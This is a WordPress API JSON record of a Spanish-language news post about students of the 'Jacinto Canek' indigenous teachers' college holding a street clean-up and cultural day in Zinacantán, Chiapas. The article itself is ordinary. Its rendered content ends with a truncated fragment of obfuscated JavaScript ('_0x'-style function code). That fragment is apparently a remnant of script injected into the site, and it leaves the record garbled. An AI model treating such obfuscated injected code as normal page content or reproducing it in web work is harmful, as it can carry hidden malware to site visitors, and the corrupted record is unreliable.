{"id":22887,"date":"2025-07-10T04:07:29","date_gmt":"2025-07-10T04:07:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22887"},"modified":"2025-07-10T04:07:30","modified_gmt":"2025-07-10T04:07:30","slug":"estudiantes-de-la-jacinto-canek-impulsan-jornada-ambiental-y-cultural-en-zinacantan","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22887","title":{"rendered":"Estudiantes de la \u201cJacinto Canek\u201d impulsan jornada ambiental y cultural en Zinacant\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214544-1024x771.jpg\" alt=\"\" class=\"wp-image-22888\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214544-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214544-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214544-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214544-1536x1156.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214544.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>YolandaRodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>9 de julio del 2025. Zinacant\u00e1n.\u2013 Con la intenci\u00f3n de promover la conciencia ambiental y reafirmar su compromiso con la comunidad, estudiantes de la Escuela Normal Ind\u00edgena Intercultural Biling\u00fce \u201cJacinto Canek\u201d realizaron una campa\u00f1a de limpieza en diversos puntos de la cabecera municipal de Zinacant\u00e1n.<\/p>\n\n\n\n<p>La jornada cont\u00f3 con la participaci\u00f3n activa de m\u00e1s de un centenar de alumnos, quienes recorrieron calles y tramos carreteros recolectando residuos s\u00f3lidos que, de manera negligente, son arrojados por peatones y conductores. La iniciativa busca generar una mayor responsabilidad ciudadana respecto al manejo de los desechos, adem\u00e1s de aportar al embellecimiento del entorno urbano.<\/p>\n\n\n\n<p>Los normalistas se\u00f1alaron que esta actividad forma parte de una tradici\u00f3n institucional que se lleva a cabo a\u00f1o con a\u00f1o, como una forma de reflejar su identidad y compromiso como estudiantes ind\u00edgenas biling\u00fces, adem\u00e1s de propiciar una imagen positiva ante la sociedad.<\/p>\n\n\n\n<p>Asimismo, destacaron que uno de los objetivos es ofrecer una mejor imagen del municipio a quienes lo visitan, promoviendo un ambiente limpio y ordenado que fortalezca el atractivo tur\u00edstico de la regi\u00f3n.<\/p>\n\n\n\n<p>Durante la campa\u00f1a tambi\u00e9n se llevaron a cabo expresiones culturales, que complementaron la actividad ambiental y permitieron a los estudiantes compartir elementos de su herencia y formaci\u00f3n con la comunidad local.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>YolandaRodr\u00edguez\/ corresponsal 9 de julio del 2025. Zinacant\u00e1n.\u2013 Con la intenci\u00f3n de promover la conciencia ambiental y reafirmar su compromiso con la comunidad, estudiantes de la Escuela Normal Ind\u00edgena Intercultural Biling\u00fce \u201cJacinto Canek\u201d realizaron una campa\u00f1a de limpieza en diversos puntos de la cabecera municipal de Zinacant\u00e1n. La jornada cont\u00f3 con la participaci\u00f3n activa de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22888,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22887","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22887","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22887"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22887\/revisions"}],"predecessor-version":[{"id":22889,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22887\/revisions\/22889"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22888"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22887"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22887"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22887"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}